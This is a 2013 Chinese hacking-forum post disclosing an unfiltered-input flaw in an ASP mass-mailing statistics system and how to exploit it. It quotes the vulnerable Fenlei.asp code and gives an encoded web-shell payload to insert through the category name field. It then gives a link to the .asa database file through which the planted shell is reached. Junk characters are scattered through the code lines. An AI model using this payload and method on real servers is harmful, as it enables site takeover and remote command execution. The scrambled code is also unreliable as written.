找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2097|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp
  A6 H! t/ X5 X; f
7 v3 ]  U- s* l9 W/ _' X, S! [IF Request.QueryString("Action")="del" Then & }8 Y. J- m. t2 \$ z- b6 T: Z* i6 e% w7 w
ID=Request.QueryString("ID") + ~/ S! Z' v6 s
IF Countss ("tui","Fenlei",ID )<>0 then
& J0 a) S) f3 ]- i9 C'略
' g% _1 ^1 k. s/ o7 }. kIF Request.QueryString("Action")="Add" Then
9 r3 V! _, G; q4 h0 FTname=Request.Form("Typename") " G' @* ^0 v" w3 o3 W
Set Rs=Server.CreateObject("adodb.Recordset") - {4 N; g+ W0 |# ?+ H6 h
Sql="Select * From Fenlei Order by id Desc " + Y" q# T& g1 }  d
Rs.Open Sql,Conn,1,3
5 M, Q8 \) y; l. R  TRs.Addnew
, ]" s: s# F. j  o: ~" QRs("Typename")=Tname
* e* h* c! b! P& S8 p; Q  o'略
: W  q8 S( ]! i4 G5 ?+ P' ZSet Rs=Server.CreateObject("adodb.Recordset") 2 ^8 b8 P1 `# u
Sql="Select * From Fenlei Order by id Desc "
2 r+ h, I2 ]+ [1 C  G/ mRs.Open Sql,Conn,1,1
) z3 @& P7 i# s. C. X'略 $ b2 y7 f3 ?; d! `! V
%>
' `  \5 X- x' o & ]1 U" s9 M, `0 e6 x

+ W2 E* d0 g7 g* B
6 }8 F3 f+ ^% i. S. @没有过滤,直接写入数据库。6 B, D: D5 s" T9 ^# d- I

2 \2 }0 ]3 c# G, ~, `8 M: r1 X利用方法:2 v, ?7 G) P2 b* i2 E' T8 }
" o5 `, ?* ~$ K+ u9 Z
插入:┼攠數畣整爠煥敵瑳∨≡┩>0 Z2 i# L" c) Z& b/ E  c

! _( f4 f0 |5 \" r; x8 H) H$ v" G & Y; L5 `. H4 A9 t, j, V
连接: http://www.xxx.com/###tongbaner.asa + s1 I! t) M/ G: U6 U8 V
'默认安装文件:
: A  k" j+ X$ o1 [" z) f'install.asp: B/ v, g6 L$ e& `, V) B0 R$ F
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表